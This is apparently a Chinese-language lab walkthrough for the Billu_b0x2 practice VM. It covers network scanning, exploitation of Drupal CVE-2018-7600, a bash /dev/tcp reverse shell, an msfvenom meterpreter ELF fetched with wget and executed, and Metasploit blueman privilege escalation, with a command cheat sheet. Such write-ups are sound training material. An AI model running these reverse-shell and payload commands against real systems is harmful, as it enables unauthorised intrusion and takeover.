简单打靶场之billu_b0x2
字数 973 2025-08-12 11:34:27

Billu_b0x2 靶场渗透测试教学文档

0x01 靶场环境搭建

  1. 虚拟机准备

    • 使用VMware打开billu_b0x.ova文件
    • 如遇弹窗提示,选择"重试"
    • 网络模式选择:
      • 如果路由器无需二次认证:选择桥接模式
      • 如需二次认证:选择NAT模式(推荐)
  2. 启动虚拟机

    • 点击"开启此虚拟机"启动靶机

0x02 信息收集阶段

主机发现

# 使用Metasploit的ARP扫描模块
use auxiliary/scanner/discovery/arp_sweep
info  # 查看模块信息
show options  # 显示配置选项
set RHOSTS 192.168.91.0/24  # 设置扫描范围
set THREADS 30  # 设置线程数
run  # 执行扫描

端口扫描

nmap -T4 -sC -sV -p- 192.168.91.150

开放端口

  • 22 (SSH)
  • 80 (HTTP)
  • 111 (RPC)
  • 8080 (HTTP代理)
  • 33371 (未知服务)

0x03 漏洞利用

Drupal CVE-2018-7600 RCE漏洞利用

  1. 漏洞确认

    • 使用自动化工具(Goby/fscan)扫描确认漏洞存在
  2. 手动利用步骤

    • 将POC代理到Burp Suite中
    • 修改执行命令部分
  3. 反弹Shell尝试

# 攻击机监听
nc -nlvp 6666

# 尝试URL编码后执行反弹Shell
echo "bash -i >& /dev/tcp/192.168.91.139/6666 0>&1" | bash

注:如不成功,采用备用方案

备用利用方案:MSF后门

  1. 生成Payload
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.139 LPORT=4444 -f elf > shell.elf
  1. 搭建HTTP服务
python3 -m http.server
  1. MSF监听设置
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.91.139
set LPORT 4444
run
  1. 靶机执行
wget http://攻击机IP:8000/shell.elf
chmod 777 shell.elf
./shell.elf &

0x04 权限提升

  1. 漏洞探测
run post/multi/recon/local_exploit_suggester
  1. 利用blueman提权漏洞
use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc
set session 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp  # 必须与之前一致
exploit

关键点:Payload类型必须与初始会话建立时使用的保持一致,否则无法成功提权。

0x05 总结与经验

  1. 工具选择

    • 自动化工具(Goby/fscan)可快速识别漏洞
    • Metasploit提供稳定可靠的利用链
  2. 常见问题解决

    • 反弹Shell失败时考虑替代方案
    • 提权失败时检查Payload一致性
  3. 学习要点

    • 信息收集的全面性
    • 多种利用方式的掌握
    • 提权时的细节注意

附录:常用命令速查

功能 命令
ARP扫描 use auxiliary/scanner/discovery/arp_sweep
端口扫描 nmap -T4 -sC -sV -p- [IP]
生成Payload msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
HTTP服务 python3 -m http.server
漏洞探测 run post/multi/recon/local_exploit_suggester
Billu_ b0x2 靶场渗透测试教学文档 0x01 靶场环境搭建 虚拟机准备 : 使用VMware打开 billu_b0x.ova 文件 如遇弹窗提示,选择"重试" 网络模式选择: 如果路由器无需二次认证:选择桥接模式 如需二次认证:选择NAT模式(推荐) 启动虚拟机 : 点击"开启此虚拟机"启动靶机 0x02 信息收集阶段 主机发现 端口扫描 开放端口 : 22 (SSH) 80 (HTTP) 111 (RPC) 8080 (HTTP代理) 33371 (未知服务) 0x03 漏洞利用 Drupal CVE-2018-7600 RCE漏洞利用 漏洞确认 : 使用自动化工具(Goby/fscan)扫描确认漏洞存在 手动利用步骤 : 将POC代理到Burp Suite中 修改执行命令部分 反弹Shell尝试 : 注:如不成功,采用备用方案 备用利用方案:MSF后门 生成Payload : 搭建HTTP服务 : MSF监听设置 : 靶机执行 : 0x04 权限提升 漏洞探测 : 利用blueman提权漏洞 : 关键点 :Payload类型必须与初始会话建立时使用的保持一致,否则无法成功提权。 0x05 总结与经验 工具选择 : 自动化工具(Goby/fscan)可快速识别漏洞 Metasploit提供稳定可靠的利用链 常见问题解决 : 反弹Shell失败时考虑替代方案 提权失败时检查Payload一致性 学习要点 : 信息收集的全面性 多种利用方式的掌握 提权时的细节注意 附录:常用命令速查 | 功能 | 命令 | |------|------| | ARP扫描 | use auxiliary/scanner/discovery/arp_sweep | | 端口扫描 | nmap -T4 -sC -sV -p- [IP] | | 生成Payload | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf | | HTTP服务 | python3 -m http.server | | 漏洞探测 | run post/multi/recon/local_exploit_suggester |